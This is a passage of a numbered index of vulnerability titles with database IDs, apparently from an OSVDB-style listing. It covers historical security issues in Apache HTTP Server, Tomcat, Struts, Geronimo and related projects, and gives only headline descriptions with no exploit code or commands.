17231| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
17232| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
17233| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
17234| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
17235| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
17236| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
17237| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
17238| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
17239| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
17240| [58687] Apache Axis Invalid wsdl Request XSS
17241| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
17242| [58685] Apache Velocity Template Designer Privileged Code Execution
17243| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
17244| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
17245| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
17246| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
17247| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
17248| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
17249| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
17250| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
17251| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
17252| [58667] Apache Roller Database Cleartext Passwords Disclosure
17253| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
17254| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
17255| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
17256| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
17257| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
17258| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
17259| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
17260| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
17261| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
17262| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
17263| [56984] Apache Xerces2 Java Malformed XML Input DoS
17264| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
17265| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
17266| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
17267| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
17268| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
17269| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
17270| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
17271| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
17272| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
17273| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
17274| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
17275| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
17276| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
17277| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
17278| [55056] Apache Tomcat Cross-application TLD File Manipulation
17279| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
17280| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
17281| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
17282| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
17283| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
17284| [54589] Apache Jserv Nonexistent JSP Request XSS
17285| [54122] Apache Struts s:a / s:url Tag href Element XSS
17286| [54093] Apache ActiveMQ Web Console JMS Message XSS
17287| [53932] Apache Geronimo Multiple Admin Function CSRF
17288| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
17289| [53930] Apache Geronimo /console/portal/ URI XSS
17290| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
17291| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
17292| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
17293| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
17294| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
17295| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
17296| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
17297| [53380] Apache Struts Unspecified XSS
17298| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
17299| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
17300| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
17301| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
17302| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
17303| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
17304| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
17305| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
17306| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
17307| [51151] Apache Roller Search Function q Parameter XSS
17308| [50482] PHP with Apache php_value Order Unspecified Issue
17309| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
17310| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
17311| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
17312| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
17313| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
17314| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
17315| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
17316| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
17317| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
17318| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
17319| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
17320| [47096] Oracle Weblogic Apache Connector POST Request Overflow
17321| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
17322| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
17323| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
17324| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
17325| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
17326| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
17327| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
17328| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
17329| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
17330| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
17331| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
17332| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
17333| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
17334| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
17335| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
17336| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
17337| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
17338| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
17339| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
17340| [43452] Apache Tomcat HTTP Request Smuggling
17341| [43309] Apache Geronimo LoginModule Login Method Bypass
17342| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
17343| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
17344| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
17345| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
17346| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
17347| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
17348| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
17349| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
17350| [42091] Apache Maven Site Plugin Installation Permission Weakness
17351| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
17352| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
17353| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
17354| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
17355| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
17356| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
17357| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
17358| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
17359| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
17360| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
17361| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
17362| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
17363| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
17364| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
17365| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
17366| [40262] Apache HTTP Server mod_status refresh XSS
17367| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
17368| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
17369| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
17370| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
17371| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
17372| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
17373| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
17374| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
17375| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
17376| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
17377| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
17378| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
17379| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
17380| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
17381| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
17382| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
17383| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
17384| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
17385| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
17386| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
17387| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
17388| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
17389| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
17390| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
17391| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
17392| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
17393| [36080] Apache Tomcat JSP Examples Crafted URI XSS
17394| [36079] Apache Tomcat Manager Uploaded Filename XSS
17395| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
17396| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
17397| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
17398| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
17399| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
17400| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
17401| [34881] Apache Tomcat Malformed Accept-Language Header XSS
17402| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
17403| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
17404| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
17405| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
17406| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
17407| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
17408| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
17409| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
17410| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
17411| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
17412| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
17413| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
17414| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
17415| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
17416| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
17417| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
17418| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
17419| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
17420| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
17421| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
17422| [32724] Apache mod_python _filter_read Freed Memory Disclosure
17423| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
17424| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
17425| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
17426| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
17427| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
17428| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
17429| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
17430| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
17431| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
17432| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
17433| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
17434| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
17435| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
17436| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
17437| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
17438| [24365] Apache Struts Multiple Function Error Message XSS
17439| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
17440| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
17441| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
17442| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
17443| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
17444| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
17445| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
17446| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
17447| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
17448| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
17449| [22459] Apache Geronimo Error Page XSS
17450| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
17451| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
17452| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
17453| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
17454| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
17455| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
17456| [21021] Apache Struts Error Message XSS
17457| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
17458| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
17459| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
17460| [20439] Apache Tomcat Directory Listing Saturation DoS
17461| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
17462| [20285] Apache HTTP Server Log File Control Character Injection
17463| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
17464| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
17465| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
17466| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
17467| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
17468| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
17469| [19821] Apache Tomcat Malformed Post Request Information Disclosure
17470| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
17471| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
17472| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
17473| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
17474| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
17475| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
17476| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
17477| [18233] Apache HTTP Server htdigest user Variable Overfow
17478| [17738] Apache HTTP Server HTTP Request Smuggling
17479| [16586] Apache HTTP Server Win32 GET Overflow DoS
17480| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
17481| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
17482| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
17483| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
17484| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
17485| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
17486| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
17487| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
17488| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
17489| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
17490| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
17491| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
17492| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
17493| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
17494| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
17495| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
17496| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
17497| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
17498| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
17499| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
17500| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
17501| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
17502| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
17503| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
17504| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
17505| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
17506| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
17507| [13304] Apache Tomcat realPath.jsp Path Disclosure
17508| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
17509| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
17510| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
17511| [12848] Apache HTTP Server htdigest realm Variable Overflow
17512| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
17513| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
17514| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
17515| [12557] Apache HTTP Server prefork MPM accept Error DoS
17516| [12233] Apache Tomcat MS-DOS Device Name Request DoS
17517| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
17518| [12231] Apache Tomcat web.xml Arbitrary File Access
17519| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
17520| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
17521| [12178] Apache Jakarta Lucene results.jsp XSS
17522| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
17523| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
17524| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
17525| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
17526| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
17527| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
17528| [10471] Apache Xerces-C++ XML Parser DoS
17529| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
17530| [10068] Apache HTTP Server htpasswd Local Overflow
17531| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
17532| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
17533| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
17534| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
17535| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
17536| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
17537| [9717] Apache HTTP Server mod_cookies Cookie Overflow
17538| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
17539| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
17540| [9714] Apache Authentication Module Threaded MPM DoS
17541| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
17542| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
17543| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
17544| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
17545| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
17546| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
17547| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
17548| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
17549| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
17550| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
17551| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
17552| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
17553| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
17554| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
17555| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
17556| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
17557| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
17558| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
17559| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
17560| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
17561| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
17562| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
17563| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
17564| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
17565| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
17566| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
17567| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
17568| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
17569| [9208] Apache Tomcat .jsp Encoded Newline XSS
17570| [9204] Apache Tomcat ROOT Application XSS
17571| [9203] Apache Tomcat examples Application XSS
17572| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
17573| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
17574| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
17575| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
17576| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
17577| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
17578| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
17579| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
17580| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
17581| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
17582| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
17583| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
17584| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
17585| [7611] Apache HTTP Server mod_alias Local Overflow
17586| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
17587| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
17588| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
17589| [6882] Apache mod_python Malformed Query String Variant DoS
17590| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
17591| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
17592| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
17593| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
17594| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
17595| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
17596| [5526] Apache Tomcat Long .JSP URI Path Disclosure
17597| [5278] Apache Tomcat web.xml Restriction Bypass
17598| [5051] Apache Tomcat Null Character DoS
17599| [4973] Apache Tomcat servlet Mapping XSS
17600| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
17601| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
17602| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
17603| [4568] mod_survey For Apache ENV Tags SQL Injection
17604| [4553] Apache HTTP Server ApacheBench Overflow DoS
17605| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
17606| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
17607| [4383] Apache HTTP Server Socket Race Condition DoS
17608| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
17609| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
17610| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
17611| [4231] Apache Cocoon Error Page Server Path Disclosure
17612| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
17613| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
17614| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
17615| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
17616| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
17617| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
17618| [3322] mod_php for Apache HTTP Server Process Hijack
17619| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
17620| [2885] Apache mod_python Malformed Query String DoS
17621| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
17622| [2733] Apache HTTP Server mod_rewrite Local Overflow
